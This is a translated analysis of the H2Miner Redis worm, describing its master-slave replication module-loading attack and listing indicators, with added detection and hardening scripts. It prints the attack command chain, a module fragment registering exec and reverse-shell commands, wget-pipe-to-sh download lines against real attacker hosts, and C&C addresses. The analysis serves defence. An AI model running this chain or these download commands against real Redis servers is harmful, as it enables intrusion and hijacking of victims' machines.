A new outbreak of the H2Miner worm exploiting Redis RCE has been discovered

A day ago, one of the servers in my project was attacked by a similar worm. While looking for the answer to the question "what is that?", I found a great article by the Alibaba Cloud Security team. Since I did not find this article on Habr, I decided to translate it for you <3

Introduction

Recently, the Alibaba Cloud Security team discovered a sudden outbreak of H2Miner. This variant of the malicious worm uses missing authentication or weak passwords on Redis as its gateway into your systems. It then synchronizes its malicious module to the slave through master-slave replication, so that the module ends up on the attacked machine, and finally loads that module and executes malicious instructions.

Previously, attacks on Redis-exposed systems were mostly carried out by writing scheduled tasks (cron entries) or SSH keys to the machine after the attacker logged into Redis. Fortunately, that method often fails because of permission controls or differences between system versions. The module-loading method, however, lets the attacker execute commands directly or obtain a shell, which is far more dangerous for your system.

Because of the large number of Redis servers reachable from the Internet (nearly 1 million), the Alibaba Cloud Security team, as a friendly reminder, recommends that users do not expose Redis online and regularly check that their passwords are strong and have not been compromised by brute-force.

H2Miner

H2Miner is a mining botnet for Linux-based systems that can invade your system in several ways, including unauthenticated Hadoop YARN, unauthenticated Docker, and the Redis Remote Command Execution (RCE) vulnerability. The botnet works by downloading malicious scripts and malware to mine on your resources, spread the attack laterally, and maintain command-and-control (C&C) communication.

Redis RCE

This technique was presented by Pavel Toporkov at ZeroNights 2018. Starting with version 4.0, Redis supports module loading, which lets users load shared objects compiled from C into Redis to implement custom Redis commands. This feature, although useful, can be abused: in master-slave mode, files are synchronized to the slave via a full resync, and the slave writes whatever the master sends as the RDB payload into the file named by dbfilename. An attacker who controls the master can therefore deliver an arbitrary file. Once the transfer completes, the attacker loads the module on the attacked Redis instance and can execute any command.

Malware worm analysis

Recently, the Alibaba Cloud Security team noticed that the H2Miner mining botnet had grown suddenly. According to the analysis, the overall attack flow is as follows:

[Figure: overall attack flow; image not reproduced]

H2Miner uses Redis RCE for the complete attack. The attackers first target unprotected Redis servers or servers with weak passwords.

They then run config set dbfilename red2.so to change the dump file name. After that, the attackers execute the slaveof command to point master-slave replication at a host they control.

When the attacked Redis instance establishes a master-slave connection to the attacker's malicious Redis, the attacker delivers the infected module as the full-resync payload used to synchronize files. The red2.so file is thereby written onto the attacked machine. The attackers then run module load ./red2.so to load it. The module can execute commands sent by the attacker or open a reverse connection (a backdoor) giving access to the attacked machine.

    /* Fragment of the module's load routine (from red2.so): it registers two
       custom commands, system.exec and system.rev, backed by DoCommand and
       RevShellCommand. */
    if (RedisModule_CreateCommand(ctx, "system.exec",
            DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
    if (RedisModule_CreateCommand(ctx, "system.rev",
            RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

After executing a malicious command such as /bin/sh -c "wget -q -O- http://195.3.146.118/unk.sh | sh > /dev/null 2>&1", the attacker resets the dump file name and unloads the system module to cover its tracks. However, the red2.so file remains on the attacked machine. Users are advised to look for a suspicious red2.so file in the Redis instance's working directory.
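The sequence described above (config set dbfilename to a .so, slaveof to the attacker's host, module load, then the cleanup) is visible verbatim in redis-cli MONITOR output, so it can be detected as a chain. The following script is an added example, not code from the original article or from Alibaba Cloud; it parses MONITOR records, keeps per-client state, and reports both the completed chain and each sensitive command on its own. The MONITOR lines in it are constructed for the demo and use RFC 5737 documentation addresses (198.51.100.7, 192.0.2.9) rather than any real infrastructure.

```python
"""Spot the Redis module-loading chain in `redis-cli MONITOR` output.

Added example; this is not code from the original article or from Alibaba
Cloud. It tracks, per client address, the sequence the article describes:
CONFIG SET dbfilename <name>.so -> SLAVEOF <attacker host> -> MODULE LOAD.
The MONITOR lines below are constructed for the demo and use RFC 5737
documentation addresses (198.51.100.7, 192.0.2.9), not real infrastructure.
"""
import re
from collections import defaultdict

# MONITOR record: <unix time> [<db> <client ip:port>] "CMD" "arg" "arg" ...
MONITOR_RE = re.compile(r'^(?P<ts>[\d.]+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<cmd>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Commands worth an alert on their own when they arrive from an application client.
SENSITIVE = {"CONFIG", "SLAVEOF", "REPLICAOF", "MODULE"}

SAMPLE_MONITOR = """\
1578471230.104211 [0 198.51.100.7:41022] "CONFIG" "SET" "dbfilename" "red2.so"
1578471230.250431 [0 198.51.100.7:41022] "SLAVEOF" "198.51.100.7" "6379"
1578471233.917772 [0 198.51.100.7:41022] "MODULE" "LOAD" "./red2.so"
1578471234.100019 [0 198.51.100.7:41022] "system.exec" "/bin/sh -c \\"wget -q -O- http://192.0.2.9/unk.sh | sh\\""
1578471235.311002 [0 198.51.100.7:41022] "CONFIG" "SET" "dbfilename" "dump.rdb"
1578471240.000000 [0 10.0.0.5:50110] "GET" "session:abc"
"""


def parse_monitor_line(line):
    """Return (client, [args...]) for a MONITOR record, or None for other lines."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    # MONITOR escapes embedded double quotes as \"; undo that for the argument text.
    args = [a.replace('\\"', '"') for a in ARG_RE.findall(m.group("cmd"))]
    return m.group("client"), args


def detect_module_attack(lines):
    """Return [(client, alert), ...] for the given MONITOR lines.

    Per-client stages: 1 = dump file renamed to a .so, 2 = replication pointed
    at a remote master after that, 3 = MODULE LOAD after both. A completed
    chain is reported as redis-module-rce-chain; every sensitive command is
    also reported individually so a partial chain still surfaces.
    """
    stage = defaultdict(int)
    alerts = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[1]:
            continue
        client, args = parsed
        cmd = args[0].upper()
        sub = args[1].upper() if len(args) > 1 else ""
        if cmd in SENSITIVE:
            alerts.append((client, "sensitive-command:" + " ".join(args[:3])))
        if cmd == "CONFIG" and sub == "SET" and len(args) > 3:
            if args[2].lower() == "dbfilename" and args[3].lower().endswith(".so"):
                stage[client] = max(stage[client], 1)
        elif cmd in ("SLAVEOF", "REPLICAOF") and sub != "NO" and stage[client] >= 1:
            stage[client] = 2
        elif cmd == "MODULE" and sub == "LOAD" and stage[client] >= 2:
            stage[client] = 3
            alerts.append((client, "redis-module-rce-chain:" + (args[2] if len(args) > 2 else "?")))
    return alerts


if __name__ == "__main__":
    for client, alert in detect_module_attack(SAMPLE_MONITOR.splitlines()):
        print(client, alert)
```

Feed it live data with redis-cli MONITOR piped into the script; on a production instance keep in mind that MONITOR itself costs throughput, so a short sampling window or a log shipper on the replication port is the usual deployment. The per-command alerts matter because the chain breaks if the attacker sets the file name before the detector starts watching.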

Besides killing some competing malicious processes to take over their resources, the attacker follows up with a malicious script that downloads and executes a malicious binary from 142.44.191.122/kinsing. As a result, a process name or directory name containing "kinsing" on the host may indicate that the machine has been infected by this worm.

Based on the reverse-engineering results, the malware mainly performs the following functions:

  • Downloading and executing files
  • Mining
  • Maintaining C&C communication and executing attack commands


It uses masscan for external scanning to expand its reach. In addition, the C&C server's IP address is hard-coded into the program; the attacked host contacts the C&C server with HTTP requests, in which the zombie (the compromised host) identifies itself through HTTP headers.


GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
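The check-in above is easy to fingerprint in proxy or IDS logs: a Windows Chrome User-Agent arriving from a Linux host together with a set of telemetry headers (Arch, Cores, Mem, Os, Osname, Osversion, Root, Uuid, Version) that no browser sends. The following script is an added example, not code from the original article or from Alibaba Cloud; it parses a raw request and returns a verdict plus the extracted telemetry. SAMPLE_BEACON reproduces the capture above (with the UUID masked as in the article), and SAMPLE_BROWSER is a constructed ordinary browser request used as the negative case; the threshold of six matching headers is an assumption chosen to tolerate minor variation between agent builds.

```python
"""Fingerprint the H2Miner HTTP check-in shown above.

Added example; not code from the original article or from Alibaba Cloud.
It parses a raw HTTP/1.1 request and flags it as a beacon when a desktop
browser User-Agent is combined with the host-telemetry headers from the
capture (Arch, Cores, Mem, Os, Osname, Osversion, Root, Uuid, Version),
which no browser sends. SAMPLE_BEACON reproduces the article's capture
(UUID masked as in the article); SAMPLE_BROWSER is a constructed ordinary
browser request used as the negative case.
"""

TELEMETRY_HEADERS = {"arch", "cores", "mem", "os", "osname", "osversion", "root", "uuid", "version"}
MIN_TELEMETRY = 6  # assumed threshold: tolerate a few missing headers in other builds

SAMPLE_BEACON = (
    "GET /h HTTP/1.1\r\n"
    "Host: 91.215.169.111\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\r\n"
    "Arch: amd64\r\nCores: 2\r\nMem: 3944\r\nOs: linux\r\nOsname: debian\r\n"
    "Osversion: 10.0\r\nRoot: false\r\nS: k\r\n"
    "Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx\r\nVersion: 26\r\n"
    "Accept-Encoding: gzip\r\n\r\n"
)

SAMPLE_BROWSER = (  # constructed negative case: same UA, no telemetry headers
    "GET / HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\r\n"
    "Accept: text/html\r\nAccept-Encoding: gzip\r\n\r\n"
)


def parse_http_request(raw):
    """Return (method, path, headers) with header names lower-cased; body ignored."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    request_line, *header_lines = head.strip().split("\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def classify_checkin(raw):
    """Classify one request; returns the verdict, the C&C host and the extracted telemetry."""
    method, path, headers = parse_http_request(raw)
    present = set(headers) & TELEMETRY_HEADERS
    browser_ua = headers.get("user-agent", "").startswith("Mozilla/")
    # The telemetry header set is the decisive signal; the browser UA on what
    # claims to be a Linux server (Os: linux) is the contradiction worth logging.
    verdict = len(present) >= MIN_TELEMETRY and browser_ua
    return {
        "beacon": verdict,
        "method": method,
        "path": path,
        "c2_host": headers.get("host"),
        "telemetry": {name: headers[name] for name in sorted(present)},
    }


if __name__ == "__main__":
    for sample in (SAMPLE_BEACON, SAMPLE_BROWSER):
        print(classify_checkin(sample))
```

The returned telemetry (Root, Uuid, Osname) is what the operator uses to track each zombie, so keeping it in the alert gives incident responders the same host identity the attacker sees.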

Other attack methods

[Figure: other attack methods used by the worm; image not reproduced]

Addresses and links used by the worm

/kinsing

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

C&C

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

Recommendations

First, Redis should not be reachable from the Internet and should be protected with a strong password. It is also important to check that there is no red2.so file in the Redis working directory and no file or process named "kinsing" on the host.
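The two checks in the recommendation, plus the configuration that keeps the worm out in the first place, can be scripted. The following is an added example, not code from the original article or from Alibaba Cloud. audit_redis_conf() flags the redis.conf settings that let the worm in (no requirepass, listening on all interfaces, protected-mode off) and, as one hardening choice assumed here, checks that CONFIG, SLAVEOF, REPLICAOF and MODULE have been disabled with rename-command (REPLICAOF exists from Redis 5, so drop that entry on 4.x; on Redis 6 and later, ACLs are the alternative). find_iocs() looks for the article's indicators. The two config samples are constructed, and main() assumes the config lives at /etc/redis/redis.conf.

```python
"""Host checks for the recommendations above.

Added example; not code from the original article or from Alibaba Cloud.
audit_redis_conf() flags exposure-related redis.conf settings and checks
that the commands the attack needs have been disabled via rename-command
(an assumed hardening choice; ACLs are the Redis 6+ alternative).
find_iocs() looks for the article's indicators: red2.so in the Redis
working directory and "kinsing" in file or process names. The two config
samples are constructed; main() runs the checks on the live host and
assumes the config is at /etc/redis/redis.conf.
"""
import os

IOC_FILE = "red2.so"
IOC_NAME = "kinsing"
MUST_DISABLE = ("CONFIG", "SLAVEOF", "REPLICAOF", "MODULE")

WEAK_CONF = """\
# constructed: a default-style config exposed to the Internet
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

HARDENED_CONF = """\
# constructed: local-only, authenticated, risky commands disabled
bind 127.0.0.1 ::1
protected-mode yes
requirepass "replace-with-a-long-random-secret"
rename-command CONFIG ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
dir /var/lib/redis
"""


def parse_redis_conf(text):
    """Return (directives, renamed) from redis.conf text; comment lines start with #."""
    directives, renamed = {}, set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        if key.lower() == "rename-command":
            renamed.add(value.split()[0].upper())
        else:
            directives[key.lower()] = value.strip()
    return directives, renamed


def audit_redis_conf(text):
    """Return a list of findings; an empty list means none of the checked issues were found."""
    directives, renamed = parse_redis_conf(text)
    findings = []
    if not directives.get("requirepass", "").strip('"'):
        findings.append("no requirepass: anyone who can reach the port can log in")
    bind = directives.get("bind", "")
    if not bind or "0.0.0.0" in bind.split() or "::" in bind.split() or "*" in bind:
        findings.append("bind %s: listens on all interfaces" % (bind or "<unset>"))
    if directives.get("protected-mode", "yes").lower() == "no":
        findings.append("protected-mode no: unauthenticated remote clients are accepted")
    for cmd in MUST_DISABLE:
        if cmd not in renamed:
            findings.append("%s still available: needed for the module-loading chain" % cmd)
    return findings


def find_iocs(file_paths, process_names):
    """Return the file paths and process names that match the article's indicators."""
    hits = []
    for path in file_paths:
        base = os.path.basename(path).lower()
        if base == IOC_FILE or IOC_NAME in base:
            hits.append("file:" + path)
    for name in process_names:
        if IOC_NAME in name.lower():
            hits.append("process:" + name)
    return hits


def main(conf_path="/etc/redis/redis.conf"):
    """Audit the live config, then scan the Redis dir and /proc for the indicators."""
    with open(conf_path) as fh:
        conf = fh.read()
    for finding in audit_redis_conf(conf):
        print("CONF:", finding)
    directives, _ = parse_redis_conf(conf)
    redis_dir = directives.get("dir", "/var/lib/redis").strip('"')
    files = [os.path.join(redis_dir, n) for n in os.listdir(redis_dir)] if os.path.isdir(redis_dir) else []
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open("/proc/%s/comm" % pid) as fh:
                procs.append(fh.read().strip())
        except OSError:
            continue
    for hit in find_iocs(files, procs):
        print("IOC:", hit)


if __name__ == "__main__":
    main()
```

Run it as root so /proc/<pid>/comm is readable for every process. A clean audit does not prove the host is uninfected: the worm renames the dump file back afterwards, so the presence of red2.so and the network indicators listed above are the more reliable signals after the fact.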

Source: www.habr.com
